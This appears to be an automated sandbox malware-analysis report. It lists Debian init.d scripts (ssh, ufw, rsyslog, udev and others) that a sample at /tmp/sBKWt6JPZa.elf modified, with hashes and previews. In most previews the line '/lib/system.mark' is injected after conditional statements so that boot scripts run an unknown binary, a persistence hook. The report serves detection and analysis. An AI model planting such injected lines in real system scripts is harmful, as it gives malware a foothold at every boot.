Preview:	#!/bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system.mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: lvm2-lvmpolld.# Required-Start: $local_fs.# Required-Stop: $local_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: LVM2 poll daemon.### END INIT INFO..DESC="LVM2 poll daemon".DAEMON=/sbin/lvmpolld.DAEMON_ARGS="-t 60".PIDFILE=/run/lvmpolld.pid..do_start_prepare() {. mkdir -m 0700 -p /run/lvm.}..

/etc/init.d/mono-xsp4

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2518
Entropy (8bit):	5.328823038467521
Encrypted:	false
SSDEEP:	48:7HvaUX9Q3esRt3uK4PWNr/42iwk3qmA4JO4pTjmCjVwUH:7PaUX0eSt3BacznDsbjmCjVwS
MD5:	70A5C40B509AEA9932FA851AD70ACB57
SHA1:	463305EFCF59020D68D1E2111298EE20612D0D73
SHA-256:	04F0D49C9370F56A6BC18A6CCDE3672D5B1A8765E6522C5C55D97CCF8A21AE5C
SHA-512:	E9BF78D0D63370C7C4ED5BA1CDFD3BA2A3269269EFEC61C1027CC1FD37496CE6F179E8BDBB5554C23234744CEFE39C3CB7964C22C8A99618E83160D3E0DC879B
Malicious:	true
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: mono-xsp4.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Should-Start: .# Should-Stop:.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Mono XSP4.# Description: Debian init script for Mono XSP4..### END INIT INFO.#.# Written by Pablo Fischer <pablo@pablo.com.mx>.# Dylan R. E. Moonfire <debian@mfgames.com>.# Modified for Debian GNU/Linux.#.# Version:.@(#)mono-xsp4 pablo@pablo.com.mx.#..# Variables.PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/bin/xsp4.NAME=mono-xsp4.DESC="XSP 4.0 WebServer".DEFAULT=/etc/default/$NAME.CFGDIR=/etc/xsp4.VIRTUALFILE=$CFGDIR/debian.webapp.MONO_SHARED_DIR=/var/run/$NAME.start_boot=false..# Use LSB.. /lib/lsb/init-functions..# If we don't have the basics, don't bother.test -x $DAEMON \|\| exit 0.test -f $DEFAULT && . $DEFAULT...if [ "x$start_boot" != "xtrue" ] ; then./lib/system.mark. exit 0.fi..if [ ! -e $MO

/etc/init.d/multipath-tools

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2964
Entropy (8bit):	5.319082661316184
Encrypted:	false
SSDEEP:	48:7HUksR9JmtLLCDCJ9ETaPn1PCDCJ9ETafOBUV1kqH2fQuEfg64U149Hh7KKSKMs:7HUkwbmhmDr+Pn1qDr+2qV1RHSQuav4D
MD5:	FA339A7172040C330DC30E65E29BE1D1
SHA1:	F558AD0D3435E5F9E486820B9844031CF83450B1
SHA-256:	7C1F374BB9BBDB94BE70ED2E096594A97C0A8E4A79F28F7D5789A0BE7BCE4983
SHA-512:	C5E80E9CBB87EE001E60B84D8A89464BE8661EAD8CAF2453A20B8073EF0CF87524FF1959FF1020F363F7341A3938614FBA6258FFE145AF1B4DD826D5DA5D923B
Malicious:	true
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: multipath-tools.# Required-Start: udev $local_fs $remote_fs $syslog.# Required-Stop: udev $local_fs $remote_fs $syslog.# Should-Start: iscsi.# Should-Stop: iscsi.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: multipath daemon.# Description:.### END INIT INFO..PATH=/sbin:/bin:/usr/sbin/:/usr/bin.DAEMON=/sbin/multipathd.NAME=multipathd.DESC="multipath daemon".syspath=/sys/block..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..if [ -f /etc/default/multipath-tools ] ; then./lib/system.mark... /etc/default/multipath-tools.fi..teardown_slaves().{.cd $1; .if [ -d "slaves" ]; then./lib/system.mark.for slave in slaves/;.do..if [ "$slave" = "slaves/" ]; then./lib/system.mark...read dev < $1/dev...tablename=$(dmsetup table --target multipath \| sed -n "s/$.$: . $dev .*/\1/p")...if ! [ -z $tablename ]; then./lib/system.mark....log_daemon_msg "Root is on a multipathed device, multipathd c

/etc/init.d/open-iscsi

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2589
Entropy (8bit):	5.114269594803135
Encrypted:	false
SSDEEP:	48:7UMRMrEm3cy8NL/NgZlfHMtWBAl3ATeTPAdWI4RdWdtRHg02AC9ArANTcAhicF:7b2rH338lmZlfs/lwA4dWI6C7DUbL
MD5:	B48EB035141800F7976971DFDB30D671
SHA1:	18D8B59AD64232DEBB186270DA8172D0C1DE47A8
SHA-256:	E28FD9022AC23B3ED07D6223DC2EAA12DDE98FAA3D8AF142CB091C9C58ACB3A3
SHA-512:	7D617DC4E0DA0BE90FB869253093E122A9EF3F78AE0F838167BDF210AA0310A2E753EB2E22B45A9BE4E05C4DDE711AE0768BC3CF21650D990F3BFF29D4D59EA7
Malicious:	true
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: open-iscsi iscsi.# Required-Start: $network $local_fs iscsid.# Required-Stop: $network $local_fs iscsid sendsigs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: Login to default iSCSI targets.# Description: Login to default iSCSI targets at boot and log out.# of all iSCSI targets at shutdown..### END INIT INFO..PATH=/sbin:/bin.DAEMON=/sbin/iscsid.ADM=/sbin/iscsiadm.PIDFILE=/run/iscsid.pid.NAMEFILE=/etc/iscsi/initiatorname.iscsi.CONFIGFILE=/etc/iscsi/iscsid.conf.OMITDIR=/run/sendsigs.omit.d..[ -x "$DAEMON" ] \|\| exit 0... /lib/lsb/init-functions..# Include defaults if available.if [ -f /etc/default/open-iscsi ]; then./lib/system.mark... /etc/default/open-iscsi.fi...if [ ! -d /sys/class/ ]; then./lib/system.mark. log_failure_msg "iSCSI requires a mounted sysfs, not started.". exit 0.fi..RETVAL=0..start() {..if ! [ -s $PIDFILE ] \|\| ! kill -0 `sed -n 1p $PIDFILE` >/dev/null ; then./l

/etc/init.d/open-vm-tools

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1881
Entropy (8bit):	4.866964949464276
Encrypted:	false
SSDEEP:	48:1a/f0aOHh8R/X/DA4pWh8FgM8QhmMl8FkgPooG2DKYUP:1a/f0aOB8Rk4e8j8Q8Ml8OmooG2D3k
MD5:	97AC49C2355ACB94890353EE4381A945
SHA1:	D847EF688D5785E54FB463C2E00B0922BA0E4060
SHA-256:	86FBD32099B190A52DFF0ADCFB72BE3F9C13C3A6F47DE40EA3DF1E056B9616B5
SHA-512:	FA42FE8BD21D8C08CD437817F9E29EEED43961E13E3E0456E42696921D14BCD307A0E38580D2DD97D5D5F0A23BF8523748BAB6AA1187D227EE7F5DD99207911E
Malicious:	true
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides:..open-vm-tools.# Required-Start:.$local_fs $remote_fs.# Required-Stop:.$local_fs $remote_fs.# X-Start-Before:.# X-Stop-After:.# Default-Start:.2 3 4 5.# Default-Stop:..0 1 6.# Description:..Runs the open-vm-tools services.# Short-Description:.Runs the open-vm-tools services.### END INIT INFO... /lib/lsb/init-functions..exit_if_not_in_vm () {. if which systemd-detect-virt 1>/dev/null; then./lib/system.mark. checktool='systemd-detect-virt'. else. checktool='vmware-checkvm'. fi.. if ! ${checktool} \| grep -iq vmware; then./lib/system.mark. echo "open-vm-tools: not starting as this is not a VMware VM". exit 0. fi.}..case "${1}" in. start). # Check if we're running inside VMWare. exit_if_not_in_vm.. log_daemon_msg "Starting open-vm daemon" "vmtoolsd". start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd --test > /dev/null \|\| exit 1.

/etc/init.d/plymouth

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1401
Entropy (8bit):	5.307601355730172
Encrypted:	false
SSDEEP:	24:1sqE3A2EYVwMwRwDTMBgK2APfcVwAPYIpPgfS+UGgEIT8YojAf5XERmgLGmgOS/F:1sl3AhYG7RgzJAsVwAgGYfdUz58Y9f5v
MD5:	0F6B71C6CC119B9DDB34511BD4CF6A49
SHA1:	F7D8BE03B71EB7597F724CB97C2A8AE62F14A843
SHA-256:	6A8A127B9D7DE62A9130A55E39521A26D48BE4EC9830AC0C986E3202FE5C5B3C
SHA-512:	EA0DA81729692BA97978031A72AA79B06E004F1B6D9AE534C68F34AEB65A5FFD9F91F5C1CA27CB6E38DE20E86A0C3C6E5A84C0A70E011C5D91AFBBA7EA647BB4
Malicious:	true
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides:..plymouth.# Required-Start:.udev $remote_fs $all.# Required-Stop:.$remote_fs.# Should-Start:..$x-display-manager.# Should-Stop:..$x-display-manager.# Default-Start:.2 3 4 5.# Default-Stop:..0 6.# Short-Description:.Stop plymouth during boot and start it on shutdown.### END INIT INFO..PATH="/sbin:/bin:/usr/sbin:/usr/bin".NAME="plymouth".DESC="Boot splash manager"..test -x /sbin/plymouthd \|\| exit 0..if [ -r "/etc/default/${NAME}" ].then./lib/system.mark... "/etc/default/${NAME}".fi... /lib/lsb/init-functions..set -e..SPLASH="true".for ARGUMENT in $(cat /proc/cmdline).do..case "${ARGUMENT}" in...splash)....SPLASH="true"....;;....nosplash\|plymouth.enable=0)....SPLASH="false"....;;..esac.done..case "${1}" in..start)...case "${SPLASH}" in....true)...../bin/plymouth quit --retain-splash.....;;...esac...;;...stop)...case "${SPLASH}" in....true).....if ! plymouth --ping.....then./lib/system.mark....../sbin/plymouthd --mode=shutdown.....fi......RUNLEV

/etc/init.d/plymouth-log

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	787
Entropy (8bit):	5.281955883729912
Encrypted:	false
SSDEEP:	12:1snBEfVmWr2lr4HhJ8PWXsbgwfGgrCRzD02xgvRiqhtcy5RujGqGRujrVgDn:1sBEf0FlwhuPBb9GgMHxgvR4MLoVS
MD5:	F42950D3F937B049D8ECC88A59A65CA3
SHA1:	E74080DDEE0664F4069E7558C68D2795B752DC55
SHA-256:	6637BB47EA46FB3556AF6B2A9A39574046FD06237D0BB65D7077F3734B593A00
SHA-512:	15E48460FDDF9863D5827E8B584BBED72C7EA95DF67C4A9A68E5CF4750C35DEFB8C5C6311DCDCEE9E2608DEE91DC6F76F8D6ED69287F6619AFCF5904AA72A168
Malicious:	true
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides:..plymouth-log.# Required-Start:.$local_fs $remote_fs.# Required-Stop:.$local_fs $remote_fs.# Should-Start:.# Should-Stop:.# Default-Start:.S.# Default-Stop:.# Short-Description:.Inform plymouth that /var/log is writable.### END INIT INFO..PATH="/sbin:/bin:/usr/sbin:/usr/bin".NAME="plymouth-log".DESC="Boot splash manager (write log file)"..test -x /bin/plymouth \|\| exit 0..if [ -r "/etc/default/${NAME}" ].then./lib/system.mark... "/etc/default/${NAME}".fi... /lib/lsb/init-functions..set -e..case "${1}" in..start)...if plymouth --ping...then./lib/system.mark..../bin/plymouth update-root-fs --read-write...fi...;;...stop\|restart\|force-reload)....;;...*)...echo "Usage: ${0} {start\|stop\|restart\|force-reload}" >&2...exit 1...;;.esac..exit 0..

/etc/init.d/procps

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	942
Entropy (8bit):	5.254527998623176
Encrypted:	false
SSDEEP:	12:atdRDNeBuYryMmCU3sBww+k12FsnM5ldlPSSHTm5TeQxala5tV86s+L2s4hk2z7w:aLXx/25+Z+nMfTWTeCKa3VfhL69z0
MD5:	CBFDB92FECA62D963DF3A25F15C3E88D
SHA1:	14A84AD6ACD0DDD5777C86FAC10894212CE44F57
SHA-256:	84225825C32D1961412656F3D0F7D43B2BBB7BB84B34B94B8C678BAC10367DF2
SHA-512:	1FF7EC530B2CEB51C342E1103849F79B935EAC27965C081F90298B74909C1676B88CBEC2E792418F00CC8BFECB4E47B28F137B233A2325F508A550236BDADE4B
Malicious:	true
Preview:	#! /bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system.mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: procps.# Required-Start: mountkernfs $local_fs.# Required-Stop:.# Should-Start: udev module-init-tools.# X-Start-Before: $network.# Default-Start: S.# Default-Stop:.# Short-Description: Configure kernel parameters at boottime.# Description: Loads kernel parameters that are specified in /etc/sysctl.conf.### END INIT INFO.#.# written by Elrond <Elrond@Wunder-Nett.org>..DESC="Setting kernel variables".DAEMON=/sbin/sysctl.PIDFILE=none..# Comment this out for sysctl to print every item changed.QUIET_SYSCTL="-q"..do_start_cmd() {..STATUS=0..$DAEMON $QUIET_SYSCTL --system \|\| STATUS=$?..return $STATUS.}..do_stop() { return 0; }.do_status() { return 0; }..

/etc/init.d/rsync

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	4639
Entropy (8bit):	5.255106060955411
Encrypted:	false
SSDEEP:	96:jdRMYo498R0Fz/T+U0lKMuHk8gajHoNUMkx:jdRMYJ98i+U0c1Ex6INUJx
MD5:	4D1E075A3D6AB76CE7754595802D6C77
SHA1:	F44434087B007BABB314B8277FFC731930DF0A13
SHA-256:	5E770B82809000BC0C33FA4901341EC6379D5B799AF444850D0C8D5B33E9B7F9
SHA-512:	59F9462BCF7A5606187A4EBA51C41D243A5C9EDE484FDD65BA28322F476C22F5FA6866D87C55C40C14E676C4BBD8D4D8455FCADEAECBF7DEA26262DF6418C72B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh..### BEGIN INIT INFO.# Provides: rsyncd.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Should-Start: $named autofs.# Default-Start: 2 3 4 5.# Default-Stop: .# Short-Description: fast remote file copy program daemon.# Description: rsync is a program that allows files to be copied to and.# from remote machines in much the same way as rcp..# This provides rsyncd daemon functionality..### END INIT INFO..set -e..# /etc/init.d/rsync: start and stop the rsync daemon..DAEMON=/usr/bin/rsync.RSYNC_ENABLE=false.RSYNC_OPTS=''.RSYNC_DEFAULTS_FILE=/etc/default/rsync.RSYNC_CONFIG_FILE=/etc/rsyncd.conf.RSYNC_PID_FILE=/var/run/rsync.pid.RSYNC_NICE_PARM=''.RSYNC_IONICE_PARM=''..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..if [ -s $RSYNC_DEFAULTS_FILE ]; then./lib/system.mark. . $RSYNC_DEFAULTS_FILE. case "x$RSYNC_ENABLE" in..xtrue\|xfalse).;;..xinetd)..exit 0....;;..*)..log_fail

/etc/init.d/rsyslog

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2899
Entropy (8bit):	5.277181564959481
Encrypted:	false
SSDEEP:	48:7cqmpKHnuoz/SWSZABLG/tm3RpZWE/eXt5Ih3iLqWpvU8lbzZdaZ2YI:75sKHuS8ZABLG1m3rZWE2Xt5Ih3iR5JT
MD5:	816DFAE328401DBA31A79591D3EBC3F2
SHA1:	C42E6F379838212F512CB4EEFEBBCD33DF67F7F0
SHA-256:	72FADCABE0BF5AD5B5BC3382B434617A3E58EE6FE8FA959B8698E5C0EACCA22F
SHA-512:	62D2B90E1EA0070B376E8E9E9E6BF49094B58491D66FD30482EA1A34FC6CDB7010B12C30012320BE3E963B6D38521E6E36E71AF069115852927859FAF30979DF
Malicious:	true
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: rsyslog.# Required-Start: $remote_fs $time.# Required-Stop: umountnfs $time.# X-Stop-After: sendsigs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: enhanced syslogd.# Description: Rsyslog is an enhanced multi-threaded syslogd..# It is quite compatible to stock sysklogd and can be .# used as a drop-in replacement..### END INIT INFO..#.# Author: Michael Biebl <biebl@debian.org>.#..# PATH should only include /usr/* if it runs after the mountnfs.sh script.PATH=/sbin:/usr/sbin:/bin:/usr/bin.DESC="enhanced syslogd".NAME=rsyslog..RSYSLOGD=rsyslogd.DAEMON=/usr/sbin/rsyslogd.PIDFILE=/run/rsyslogd.pid..SCRIPTNAME=/etc/init.d/$NAME..# Exit if the package is not installed.[ -x "$DAEMON" ] \|\| exit 0..# Read configuration variable file if it is present.[ -r /etc/default/$NAME ] && . /etc/default/$NAME..# Define LSB log_* functions... /lib/lsb/init-functions..do_st

/etc/init.d/saned

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2293
Entropy (8bit):	5.008592969018552
Encrypted:	false
SSDEEP:	24:aruzoYFiVHCVhQJABlRi5tzldBOVQReMdHwdNw5G/9yNuFibjBk2Jwq5MxnR5/2F:e7Y0u/i5t7RbewG/9diy2OXnL/iOs1
MD5:	0F06F605D05EA59E83CFDB744A720668
SHA1:	ED458D2DC1CF9F7EEACF612295016DD4C67FA431
SHA-256:	1C4C499846B5D9E180E604B84553A2ADD06C11D447C4AC5F42DB30EF5030944D
SHA-512:	B3BA6C58E83F3C79C6E28AC8EB78184003A17AB8635F013BBBD50363D515344B5619CA008F9F453A8BBBCA01BCF0E649828B0CB1ED6D1BE87085CA4E225FF84C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.#.### BEGIN INIT INFO.# Provides: saned.# Required-Start: $syslog $local_fs $remote_fs.# Required-Stop: $syslog $local_fs $remote_fs.# Should-Start: dbus avahi-daemon.# Should-Stop: dbus avahi-daemon.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: SANE network scanner server.# Description: saned makes local scanners available over the.# network..### END INIT INFO... /lib/lsb/init-functions..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/saned.NAME=saned.DESC="SANE network scanner server"..test -x $DAEMON \|\| exit 0..RUN=no.RUN_AS_USER=saned..# Get lsb functions.. /lib/lsb/init-functions..# Include saned defaults if available.if [ -f /etc/default/saned ] ; then./lib/system.mark. . /etc/default/saned.fi..DAEMON_OPTS="-a $RUN_AS_USER"..set -e..case "$1" in. start)..log_daemon_msg "Starting $DESC" "$NAME"..start-stop-daemon --start --quiet --pidfile /var/run/$N

/etc/init.d/screen-cleanup

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1274
Entropy (8bit):	5.012565313964516
Encrypted:	false
SSDEEP:	24:c26Nr+XEgBYxABoO21phrqeYCRjeyvcsTN/RdT7d/Ldld/7K9jp:cPQoO23BqeYSjeybRRdHdTdld/7K9jp
MD5:	8EFA67FAE6C01453D5F673251C44E223
SHA1:	ADDB6A8C1B7D583B959EDF19684A1BE2FA76D541
SHA-256:	48026B299BBAD064F39CB6351B3E6D60E6EA324BB9DF6D777D132F19B2386E5D
SHA-512:	306042F4929D7BCBB98CC2E14A04D3E36DA7E7BA87F7997CD46DCD7DD2F856D1102469B99D623F6F339F419FD247EBE0ED02C446ADE7FD214F6F14A9156B45F0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# $Id: init,v 1.3 2004/03/16 01:43:45 zal Exp $.#.# Script to remove stale screen named pipes on bootup..#..### BEGIN INIT INFO.# Provides: screen-cleanup.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop:.# Short-Description: screen sessions cleaning.# Description: Cleans up the screen session directory and fixes its.# permissions if needed..### END INIT INFO..set -e..test -f /usr/bin/screen \|\| exit 0..SCREENDIR=/run/screen..case "$1" in.start). if test -L $SCREENDIR \|\| ! test -d $SCREENDIR; then./lib/system.mark. rm -f $SCREENDIR. mkdir $SCREENDIR. chown root:utmp $SCREENDIR. [ -x /sbin/restorecon ] && /sbin/restorecon $SCREENDIR. fi. find $SCREENDIR -type p -delete.# If the local admin has used dpkg-statoverride to install the screen.# binary with different set[ug]id bits, change the permissions of.# $SCREENDIR accordingly. BINARYPERM=`stat -c%a /usr/bin/screen`. if [ "

/etc/init.d/spice-vdagent

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2519
Entropy (8bit):	4.743587167790472
Encrypted:	false
SSDEEP:	48:DFZazGMU+rI4CXyUH0I6zroGt//AhrHoGa//AuiIngcu/syylyTIsD2E8AB6/oBa:DF0GMU+1iD6foGtQRHoGaQuiIngczVII
MD5:	5D4D9388F89B176957FDD414AF0D3385
SHA1:	206408E65660EFF14DE046FBECC38DDA2BCD403F
SHA-256:	9EDA8584AF6D1D332C01FD105D83BF5DBD41E10148E276D350DE07835A64494D
SHA-512:	CA317DCB2DB3D6EB63088CF6548CF800C5B2D64430C34F0E587EFA9CE7B4D72B35AAD70516BEECCC19848D3AF3673DAB295F19E923BA5E4700234842BFE38EF8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.#.# spice-vdagent Agent daemon for Spice guests.#.# chkconfig: 345 70 30.# description: Together with a per X-session agent process the spice agent \.# daemon enhances the spice guest user experience with client \.# mouse mode, guest <-> client copy and paste support and more...### BEGIN INIT INFO.# Provides: . .spice-vdagent.# Required-Start: .$local_fs $remote_fs.# Required-Stop: .$local_fs $remote_fs.# Should-Start: .dbus.# Should-Stop: ..# Default-Start: .2 3 4 5.# Default-Stop: .0 1 6.# Short-Description: .Agent daemon for Spice guests.# Description: .Together with a per X-session agent process the spice agent.# .daemon enhances the spice guest user experience with client.# .mouse mode, guest <-> client copy and paste support and more..### END INIT INFO...exec="/usr/sbin/spice-vdagentd".prog="spice-vdagentd".pidfile="/var/run/spice-vdagentd/spice-vdagentd.pid".port="/dev/virtio-ports/com.redhat.spic

/etc/init.d/ssh

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	4195
Entropy (8bit):	5.078291501927291
Encrypted:	false
SSDEEP:	96:jkXSV2BP3Jr4VRy5HoYokXHe5KyWU/O8IhQ:j1ol3J8VOIPq3cBIhQ
MD5:	53996396D16C98D4AF1BF71D33AE801F
SHA1:	D47C0F3E4DE104B2DAE047AC53BA85ADFD53B26B
SHA-256:	D2C361A5A6A9FDEAF530420A519CA1BCB022B13B5B35B827544D70ED99B98720
SHA-512:	34636E86E4652B1212E5F74E4E792E46786E5FDFDB9ECB7DB085339EDCA9DF752D7B71EF97FE4738921E53825DFB0AECCE877324675A60594A0955B4EC2BFB38
Malicious:	true
Preview:	#! /bin/sh..### BEGIN INIT INFO.# Provides:..sshd.# Required-Start:.$remote_fs $syslog.# Required-Stop:.$remote_fs $syslog.# Default-Start:.2 3 4 5.# Default-Stop:...# Short-Description:.OpenBSD Secure Shell server.### END INIT INFO..set -e..# /etc/init.d/ssh: start and stop the OpenBSD "secure shell(tm)" daemon..test -x /usr/sbin/sshd \|\| exit 0.( /usr/sbin/sshd -\? 2>&1 \| grep -q OpenSSH ) 2>/dev/null \|\| exit 0..umask 022..if test -f /etc/default/ssh; then./lib/system.mark. . /etc/default/ssh.fi... /lib/lsb/init-functions..if [ -n "$2" ]; then./lib/system.mark. SSHD_OPTS="$SSHD_OPTS $2".fi..# Are we running from init?.run_by_init() {. ([ "$previous" ] && [ "$runlevel" ]) \|\| [ "$runlevel" = S ].}..check_for_no_start() {. # forget it if we're trying to start, and /etc/ssh/sshd_not_to_be_run exists. if [ -e /etc/ssh/sshd_not_to_be_run ]; then ./lib/system.mark..if [ "$1" = log_end_msg ]; then./lib/system.mark.. log_end_msg 0 \|\| true..fi..if ! run_by_init; then./lib/syst

/etc/init.d/udev

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	7281
Entropy (8bit):	4.991252121789465
Encrypted:	false
SSDEEP:	96:l7vnKGhtBLNNqeIRbyxwfmgBL6FGGgGBj2davQKBJKCYrSVDvtvP7WGP7TQKBJKk:l93DYPbV7+262daaJrSVztbWIeWymj
MD5:	6B8B951DD1036426916D86617F889FB3
SHA1:	5845C804AEE0A2C89AA314083FDB112D90B0AE75
SHA-256:	672A832E328D4AC70CE72DB88A220443383378ED574448B8A31F743707EAB48D
SHA-512:	DC3D3C056719853FE920BF0622CACFEDE05618331D85DC138C7C462B982222F2F746AF09B77815CDE542DACA4DCD24D084912CCE5F7DEE608431776D3B21BEC4
Malicious:	true
Preview:	#!/bin/sh -e.### BEGIN INIT INFO.# Provides: udev.# Required-Start: mountkernfs.# Required-Stop: umountroot.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Start systemd-udevd, populate /dev and load drivers..### END INIT INFO..PATH="/sbin:/bin".NAME="systemd-udevd".DAEMON="/lib/systemd/systemd-udevd".DESC="hotplug events dispatcher".PIDFILE="/run/udev.pid".CTRLFILE="/run/udev/control".OMITDIR="/run/sendsigs.omit.d"..# we need to unmount /dev/pts/ and remount it later over the devtmpfs.unmount_devpts() {. if mountpoint -q /dev/pts/; then./lib/system.mark. umount -n -l /dev/pts/. fi.. if mountpoint -q /dev/shm/; then./lib/system.mark. umount -n -l /dev/shm/. fi.}..# mount a devtmpfs over /dev, if somebody did not already do it.mount_devtmpfs() {. if grep -E -q "^[^[:space:]]+ /dev devtmpfs" /proc/mounts; then./lib/system.mark. mount -n -o remount,nosuid,size=$tmpfs_size,mode=0755 -t devtmpfs devtmpfs /dev. return. fi.. if ! mount -

/etc/init.d/ufw

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2220
Entropy (8bit):	4.762470767686369
Encrypted:	false
SSDEEP:	48:1LleiFZd/nzngwjacTM/JrNWwh/JbeTX9l:1BDFfrbQvnq
MD5:	8852A1EF1E949822CC57D126739775E7
SHA1:	BB530632CE040ACF6D772A83E55594AE03233D2A
SHA-256:	D47B4F30B3710EBA0EA899BD483D2639EEC4EFE1E2196F3CC69D6C317A182D9D
SHA-512:	428D49507F1A9E84BE55BA66EBD1E6557E87EABE10BC4CAB0003260279FADE812996410AFD00DA0C49E1A42C2008D2B61ADC7A43470C582FC66840120A827A1D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides: ufw.# Required-Start: $local_fs.# Required-Stop: $local_fs.# Default-Start: S.# Default-Stop: 1.# Short-Description: start firewall.# Description: Start ufw firewall.### END INIT INFO..set -e..PATH="/sbin:/bin"..[ -d /lib/ufw ] \|\| exit 0... /lib/lsb/init-functions..for s in "/lib/ufw/ufw-init-functions" "/etc/ufw/ufw.conf" "/etc/default/ufw" ; do. if [ -s "$s" ]; then./lib/system.mark. . "$s". else. log_failure_msg "Could not find $s (aborting)". exit 1. fi.done..error=0.case "$1" in.start). if [ "$ENABLED" = "yes" ] \|\| [ "$ENABLED" = "YES" ]; then./lib/system.mark. log_action_begin_msg "Starting firewall:" "ufw". output=`ufw_start` \|\| error="$?". if [ "$error" = "0" ]; then./lib/system.mark. log_action_cont_msg "Setting kernel variables ($IPT_SYSCTL)". fi. if [ ! -z "$output" ]; then./lib/system.mark. echo "$output" \| while read

/etc/init.d/unattended-upgrades

Download File

Process:	/tmp/sBKWt6JPZa.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1426
Entropy (8bit):	5.3259172883252655
Encrypted:	false
SSDEEP:	24:aMXni+12wpFKFOGofwWlf/HNVKowwflH+hF/7Px1gr:bni23FKFpbw3GnoH+Dbx2
MD5:	D520212A01E843BEC46C2A22FAD820FD
SHA1:	53E168B97E300038916C1038B59912B23AB2C0AF
SHA-256:	89C4F9A9999E7DB3526C63DF22A69161F6328EEB8E58B8640BDEB4676BFF6DA5
SHA-512:	E08F7E3736EB322F4C49636515B1AAE43299F09504A63B9920F93D2E42518108E4090E3F622AA6B18E2D196C89BAC0BF74884AA5FDC023CE25D8D529653D0876
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
